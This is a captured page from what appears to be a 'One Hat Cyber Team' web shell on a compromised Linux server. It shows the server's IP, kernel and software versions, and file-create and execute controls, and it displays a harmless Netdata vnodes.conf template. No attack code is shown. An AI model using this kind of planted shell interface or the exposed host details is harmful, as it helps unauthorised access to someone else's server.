⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
src
/
netdata
/
system
/
vnodes
/
View File Name :
vnodes.conf
## This file is in YAML format. ## ## It contains a list of virtual nodes. Virtual node, defined with the following parameters: ## ## 1. hostname ## The hostname of the virtual node. String. Required. ## 2. guid ## Uniquely identifies the node. String. Required. ## 3. labels ## The virtual node host labels. Dictionary in the form key: value. Optional. ## Special labels that are used to set virtual host system information: ## https://learn.netdata.cloud/docs/improving-netdata---developers/external-plugins#host_label ## ## You can create GUIDs online: https://www.guidgen.com/ ## or generate with the linux command: uuidgen ## ## --------------------------------------------------------------------------------------------------------------------- #- hostname: HOSTNAME1 # guid: GUID1 # #- hostname: HOSTNAME2 # guid: GUID2